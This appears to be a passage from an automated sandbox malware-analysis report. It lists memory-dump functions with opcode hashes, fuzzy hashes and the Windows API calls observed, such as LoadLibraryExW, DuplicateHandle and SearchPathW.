                                • Instruction ID: f637cd282f1b90eb7f542feeeea56d5eb6f82f75972157de9ffe0a6153ea9ab1
                                • Opcode Fuzzy Hash: cb311316866387953e425fe0d48a3ad62e4a2cef9fbd9bf6667c6a8495c325c8
                                • Instruction Fuzzy Hash: 5F713770A00B058FD724CF29C585B5AB7F1BF88304F10892EE49AD7A51DB75E906CF91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00ECFD0A
                                Memory Dump Source
                                • Source File: 0000000D.00000002.930144018.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: false
                                Similarity
                                • API ID: CreateWindow
                                • String ID:
                                • API String ID: 716092398-0
                                • Opcode ID: a8dbb5919fa72bd2569eadef3f751d089abde9feaeb356ca3d81b26f7d707700
                                • Instruction ID: 8471f141b59b8ad528486cb11c5733d5030b8d4262a8708e76989b0ba47e4a07
                                • Opcode Fuzzy Hash: a8dbb5919fa72bd2569eadef3f751d089abde9feaeb356ca3d81b26f7d707700
                                • Instruction Fuzzy Hash: F941AEB1D003099FDF14CF9AC984ADEBFB6BF88314F24812AE819AB250D7759945CF90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Memory Dump Source
                                • Source File: 0000000D.00000002.942385928.0000000006A20000.00000040.00000001.sdmp, Offset: 06A20000, based on PE: false
                                Similarity
                                • API ID: LibraryLoad
                                • String ID:
                                • API String ID: 1029625771-0
                                • Opcode ID: 89dd31b9c72ed59c521517eb01d8ff4fae28b18ccb9f7a4ff7ff5d1eeadeb1e2
                                • Instruction ID: bc6f7a7686d3412133deda07dce1bf61cc0d9c6434c0b1d99730440ac496a28b
                                • Opcode Fuzzy Hash: 89dd31b9c72ed59c521517eb01d8ff4fae28b18ccb9f7a4ff7ff5d1eeadeb1e2
                                • Instruction Fuzzy Hash: EA3153B0D0026A8FDB54DFADC885B9EBBF1FB08314F14852AE815AB380DB749585CF91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00ECBD87
                                Memory Dump Source
                                • Source File: 0000000D.00000002.930144018.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: false
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: f282babbf976df9d8b7da6cae04710f1efccd9047305006a7ae3ada927f0e92a
                                • Instruction ID: 94303a3ea5142c0d4423cbf27a034b6d7adbeba4410556a41130daa203ddec7f
                                • Opcode Fuzzy Hash: f282babbf976df9d8b7da6cae04710f1efccd9047305006a7ae3ada927f0e92a
                                • Instruction Fuzzy Hash: 7A21E0B59002499FDB10CFAAD484BDEBFF4EB48314F14802AE918A7310D378A945CFA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00ECBD87
                                Memory Dump Source
                                • Source File: 0000000D.00000002.930144018.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: false
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: e57fb89f0c2e239dbac5eb5c8af21f7cbfecc5084e1208aad56280660d256247
                                • Instruction ID: 10b787593adf6096810946c5c98de7c368f6f6ad95e805591290025af6e85200
                                • Opcode Fuzzy Hash: e57fb89f0c2e239dbac5eb5c8af21f7cbfecc5084e1208aad56280660d256247
                                • Instruction Fuzzy Hash: 3021E0B59002499FDB10CFAAD884BDEBBF4EB48314F14802AE918A3310D378A944CFA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,00EC96A9,00000800,00000000,00000000), ref: 00EC98BA
                                Memory Dump Source
                                • Source File: 0000000D.00000002.930144018.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: false
                                Similarity
                                • API ID: LibraryLoad
                                • String ID:
                                • API String ID: 1029625771-0
                                • Opcode ID: e4fd28b0d668f11ac36170a665c00cd6c640eae06145e06d11e26e79444fab28
                                • Instruction ID: 71ff8d79a6d2fc86899333f151e291e02f22e4e9f1348f02daf53d3575e70ffc
                                • Opcode Fuzzy Hash: e4fd28b0d668f11ac36170a665c00cd6c640eae06145e06d11e26e79444fab28
                                • Instruction Fuzzy Hash: 731100B69002498FDB14CF9AC448BDEFBF4EB89314F14842EE919B7600C3B5A945CFA5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,00EC96A9,00000800,00000000,00000000), ref: 00EC98BA
                                Memory Dump Source
                                • Source File: 0000000D.00000002.930144018.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: false
                                Similarity
                                • API ID: LibraryLoad
                                • String ID:
                                • API String ID: 1029625771-0
                                • Opcode ID: a273bcb90cd98e78ca53cc3bf2bf9177b5227e7c025ea1f39f3f3feffc2a7c03
                                • Instruction ID: f4a9a73a2526352bde8b40a014a2cbafc15fa8a6dcb42c006978e8e9af82393c
                                • Opcode Fuzzy Hash: a273bcb90cd98e78ca53cc3bf2bf9177b5227e7c025ea1f39f3f3feffc2a7c03
                                • Instruction Fuzzy Hash: 5B11D3B69002498FDB14CF9AD448BDEFBF4EB89314F14842ED419B7600C3B5A545CFA5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • SetWindowLongW.USER32(?,?,?), ref: 00ECFE9D
                                Memory Dump Source
                                • Source File: 0000000D.00000002.930144018.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: false
                                Similarity
                                • API ID: LongWindow
                                • String ID:
                                • API String ID: 1378638983-0
                                • Opcode ID: 1d6558453c91f0298cd8b9bdebb1924c84c7a9d2224f632740c17fb2d656e755
                                • Instruction ID: 7b21e41d5a37f441c5e60b5f43b1dfb40c755c8b3b35fbd93d1a9b6d1fd723f0
                                • Opcode Fuzzy Hash: 1d6558453c91f0298cd8b9bdebb1924c84c7a9d2224f632740c17fb2d656e755
                                • Instruction Fuzzy Hash: 451128B58002488FCB10CF99D585BDEFBF4EB48324F20842AD954B3700C375A945CFA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetModuleHandleW.KERNEL32(00000000), ref: 00EC962E
                                Memory Dump Source
                                • Source File: 0000000D.00000002.930144018.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: false
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                • Opcode ID: 81cd8603ea16a19e3b93c8480afc4e4853a1499ce52f3e6239c4d4bc94489470
                                • Instruction ID: 7300f160606d37de8e195431af19af24ee888ba45902fd228321d82708ae8579
                                • Opcode Fuzzy Hash: 81cd8603ea16a19e3b93c8480afc4e4853a1499ce52f3e6239c4d4bc94489470
                                • Instruction Fuzzy Hash: 2D11E0B5C006498FCB10CF9AC448BDEFBF4EB89314F14852AD869B7640D3B9A546CFA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • SetWindowLongW.USER32(?,?,?), ref: 00ECFE9D
                                Memory Dump Source
                                • Source File: 0000000D.00000002.930144018.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: false
                                Similarity
                                • API ID: LongWindow
                                • String ID:
                                • API String ID: 1378638983-0
                                • Opcode ID: a4a9edf250270e05db7b77e5e4384d1db6461a49b922b5be226ab26e593e062f
                                • Instruction ID: 36d366dcf22b389687f3437d1e3324146dcd2a57ff6d234df95cad960d3c4098
                                • Opcode Fuzzy Hash: a4a9edf250270e05db7b77e5e4384d1db6461a49b922b5be226ab26e593e062f
                                • Instruction Fuzzy Hash: E11103B58002498FDB10CF9AD585BDEBBF8EB48324F20841AD818B3300C3B4A944CFA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 0000000D.00000002.939935603.0000000006230000.00000040.00000001.sdmp, Offset: 06230000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e052cc68400a84fa9a32b4157d43d9765d5be983f0f549223a81379147d7d93d
                                • Instruction ID: 093bb98f9d8ad94f3e2ca7740b0788f379bbdaa59257c75df5a85e15a33ced7e
                                • Opcode Fuzzy Hash: e052cc68400a84fa9a32b4157d43d9765d5be983f0f549223a81379147d7d93d
                                • Instruction Fuzzy Hash: 3F210431B04A214FC765EA7C981065AB7E6AFC9214305C67ED94ACB794DF31ED0287E0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 0000000D.00000002.939935603.0000000006230000.00000040.00000001.sdmp, Offset: 06230000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: fda56811bb5ec1f7b9fae7590353a244d26b273b795c37f3e8cf88a61989838d
                                • Instruction ID: 4de24c164fb8bb1d96851290628eb27bfba51e8ad239348ad5072a4d0ebc4d3a
                                • Opcode Fuzzy Hash: fda56811bb5ec1f7b9fae7590353a244d26b273b795c37f3e8cf88a61989838d
                                • Instruction Fuzzy Hash: 55F0AC317083108FC751AB7CAC40496BBFACFC512130446ABE25CCB246DB219D0587F0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 0000000D.00000002.939935603.0000000006230000.00000040.00000001.sdmp, Offset: 06230000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 03987cf9f4b75ee0453aa9a680045a2bd467b31469a4d0239a2c0358c85f2fb5
                                • Instruction ID: e48040b6ac646d7ffc85d541a7ee44475d0144ea2e8529433e79c03caa5b402f
                                • Opcode Fuzzy Hash: 03987cf9f4b75ee0453aa9a680045a2bd467b31469a4d0239a2c0358c85f2fb5
                                • Instruction Fuzzy Hash: ACF02B72B50E314B8378DA688C00A5772EA9F88210704863DD445CB754EF31EC4287E0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 0000000D.00000002.939935603.0000000006230000.00000040.00000001.sdmp, Offset: 06230000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 15932f4657bfb4a9b715eccfeba605f4b4db3a161785edf08d52e45df89896f5
                                • Instruction ID: 32ba1a5369a41c102cd30481dcc0c78fac6056276f4782222df5215d7e747363
                                • Opcode Fuzzy Hash: 15932f4657bfb4a9b715eccfeba605f4b4db3a161785edf08d52e45df89896f5
                                • Instruction Fuzzy Hash: 06E0D8767046204FD314EE54A454A9E37B3AB89310305469AED8AC7291CB388E06C7A1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 0000000D.00000002.939935603.0000000006230000.00000040.00000001.sdmp, Offset: 06230000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 88be9caad3d340b5055d9a245595ecf8cb5e5bb58932217b1e43d641a0a15cef
                                • Instruction ID: 7bc94cae6b8a92b8287dd06f8336b0218384d3beea29673b8dc3d487b2acf40a
                                • Opcode Fuzzy Hash: 88be9caad3d340b5055d9a245595ecf8cb5e5bb58932217b1e43d641a0a15cef
                                • Instruction Fuzzy Hash: 15E02B36700A304B9314AE15E4047AF73EBABC81207044329ED0AC3380CF38DE4287F4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 0000000D.00000002.939935603.0000000006230000.00000040.00000001.sdmp, Offset: 06230000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9a9eaf4d131b52a7cd90f191a2bafd73b24bbbb890ac5146e11f56078b908a1f
                                • Instruction ID: 6a6ac35cd2603bd1a1571ccaf4b6c55313ea61f5c96a03d9ba14a4582c7bcc66
                                • Opcode Fuzzy Hash: 9a9eaf4d131b52a7cd90f191a2bafd73b24bbbb890ac5146e11f56078b908a1f
                                • Instruction Fuzzy Hash: EEE0DFB8C18219AEC780EFB888507EFBFF87F08200F108569C559E7301EB7002068FA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 0000000D.00000002.939935603.0000000006230000.00000040.00000001.sdmp, Offset: 06230000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 866b9cf389f74c9517437dae4c4b1faeaea08c24c47a0507d8131e2e5965aff3
                                • Instruction ID: 94d7cc590fa36851a4278aab4a9b2412e94484a75e2004d975275e76a2b331de
                                • Opcode Fuzzy Hash: 866b9cf389f74c9517437dae4c4b1faeaea08c24c47a0507d8131e2e5965aff3
                                • Instruction Fuzzy Hash: 1BE0ECB0D142199ED780EFA8C4157DEBBF4BB04204F108969C419E6641E7B446058F91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Non-executed Functions

                                Executed Functions

                                Memory Dump Source
                                • Source File: 0000000E.00000002.936438886.00000000079D0000.00000040.00000001.sdmp, Offset: 079D0000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a7e24e38c0235dcb2aaf9d8927c0d2ca8c4eb5b5df9b535c31ee24063dd456e1
                                • Instruction ID: 186fcda0fc7f6421f2791cc25b7aae09242838b1c0e29c4206ec2a2285471af6
                                • Opcode Fuzzy Hash: a7e24e38c0235dcb2aaf9d8927c0d2ca8c4eb5b5df9b535c31ee24063dd456e1
                                • Instruction Fuzzy Hash: 84B1D070B043008FDB24DB78D8447AEBBF2EF89218F148969D506AB391DB74EC06CB61
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetFileAttributesW.KERNELBASE(00000000), ref: 04809D78
                                Memory Dump Source
                                • Source File: 0000000E.00000002.931164857.0000000004800000.00000040.00000001.sdmp, Offset: 04800000, based on PE: false
                                Similarity
                                • API ID: AttributesFile
                                • String ID:
                                • API String ID: 3188754299-0
                                • Opcode ID: 41b4f2f94212141a8aaf60caa1d77ca70348cb765a026dce15d5d6628510aeb3
                                • Instruction ID: 19561c37349be8a2eaafd369ee0623421bea88519a5dc24d9f39f0cd19e83672
                                • Opcode Fuzzy Hash: 41b4f2f94212141a8aaf60caa1d77ca70348cb765a026dce15d5d6628510aeb3
                                • Instruction Fuzzy Hash: E62133B1D006599BCB10CF9AD844B9EFBB4FF49724F10862AD819A7640D774AA04CFA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetFileAttributesW.KERNELBASE(00000000), ref: 04809D78
                                Memory Dump Source
                                • Source File: 0000000E.00000002.931164857.0000000004800000.00000040.00000001.sdmp, Offset: 04800000, based on PE: false
                                Similarity
                                • API ID: AttributesFile
                                • String ID:
                                • API String ID: 3188754299-0
                                • Opcode ID: 45bfe30dc012c8f950b7913d033022e0458dd39ad89bfe9b4f3a476b0a758c86
                                • Instruction ID: df3844c8f29792567823b0d048c62f90325611a73192c9a7c3b6025163e03c16
                                • Opcode Fuzzy Hash: 45bfe30dc012c8f950b7913d033022e0458dd39ad89bfe9b4f3a476b0a758c86
                                • Instruction Fuzzy Hash: 322133B1D046599BCB10CF9AD844B9EFBF4FB49314F04862AE819B7640D774A904CFA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetFileAttributesW.KERNELBASE(00000000), ref: 04809D78
                                Memory Dump Source
                                • Source File: 0000000E.00000002.931164857.0000000004800000.00000040.00000001.sdmp, Offset: 04800000, based on PE: false
                                Similarity
                                • API ID: AttributesFile
                                • String ID:
                                • API String ID: 3188754299-0
                                • Opcode ID: 5c7a44e10fc1a76e849f51afb373f56e086c3f6d521556c32a30ba1fdec9c870
                                • Instruction ID: a83470a3d06f716e339041dfc65291fcfa1189f5985b124481bd30e8b756a2fe
                                • Opcode Fuzzy Hash: 5c7a44e10fc1a76e849f51afb373f56e086c3f6d521556c32a30ba1fdec9c870
                                • Instruction Fuzzy Hash: F10126309082459FCB41DB28D8406C9FFB4AF4521CF15CA96E148DB166D3B4A956CBE1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 0000000E.00000002.936438886.00000000079D0000.00000040.00000001.sdmp, Offset: 079D0000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c8d7c1b7056a9a11c38ec87a191eaadbc02568dbf51fd37d377338fae97ad314
                                • Instruction ID: fd616aec0e6556c4b0e95b4ad95e0a3c3a500110362125c69a64d4497a5a441e
                                • Opcode Fuzzy Hash: c8d7c1b7056a9a11c38ec87a191eaadbc02568dbf51fd37d377338fae97ad314
                                • Instruction Fuzzy Hash: 18716B70A002199FCB14DF68D980AADBBF2FF89318F15C569E405AB761DB71EC45CB90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 0000000E.00000002.936438886.00000000079D0000.00000040.00000001.sdmp, Offset: 079D0000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 455767159f8995c7aeea5611b92ddc5df640df83a4832c18d5cf4bb4f3b9141d
                                • Instruction ID: e8398220bf2911b91b44d48466b289d0f331b69d1795e61517d26b25050a58de
                                • Opcode Fuzzy Hash: 455767159f8995c7aeea5611b92ddc5df640df83a4832c18d5cf4bb4f3b9141d
                                • Instruction Fuzzy Hash: 76417A713082544F8744AB7DA89046E7796DFC112931285BAC64ACB79ADF70DC0983F1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 0000000E.00000002.936438886.00000000079D0000.00000040.00000001.sdmp, Offset: 079D0000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9dfe10690d1b51bf5af573578c05a74d2acc68cc38f93b8ebdb43c22cd523a60
                                • Instruction ID: 3130c019316b5acb1e2b7cc3c388211c0db17ed6404eff915496c2c706987c08
                                • Opcode Fuzzy Hash: 9dfe10690d1b51bf5af573578c05a74d2acc68cc38f93b8ebdb43c22cd523a60
                                • Instruction Fuzzy Hash: 22417E74B101059FDB04DF68D454A6EBBABFF89318F108469E906CB391CB75ED058BA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 0000000E.00000002.936438886.00000000079D0000.00000040.00000001.sdmp, Offset: 079D0000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 499e46bcd8ddae64667585e4d9898913d10bbebf83d0e06a999ae467a660268a
                                • Instruction ID: 0dcd44020ab2bea280f0ac5e3b5fff39a9dc8a36e3dac21066713b7e61143264
                                • Opcode Fuzzy Hash: 499e46bcd8ddae64667585e4d9898913d10bbebf83d0e06a999ae467a660268a
                                • Instruction Fuzzy Hash: 694168B4E00209CFDB54DFA8D444AEDB7F6AF88308F148429D806AB390DB74AC45CF60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 0000000E.00000002.936438886.00000000079D0000.00000040.00000001.sdmp, Offset: 079D0000, based on PE: false

                                Memory Dump Source
                                • Source File: 0000000E.00000002.936217558.0000000007950000.00000040.00000001.sdmp, Offset: 07950000, based on PE: false

                                Non-executed Functions

                                Executed Functions

                                APIs
                                • SearchPathW.KERNELBASE(?,?,?,?,00000000,00000000), ref: 02AC1A4B
                                Memory Dump Source
                                • Source File: 00000012.00000002.841450747.0000000002AC0000.00000040.00000001.sdmp, Offset: 02AC0000, based on PE: false

                                Non-executed Functions

                                Executed Functions

                                APIs
                                • SearchPathW.KERNELBASE(?,?,?,?,00000000,00000000), ref: 03061A4B
                                Memory Dump Source
                                • Source File: 00000016.00000002.845441210.0000000003060000.00000040.00000001.sdmp, Offset: 03060000, based on PE: false

                                Non-executed Functions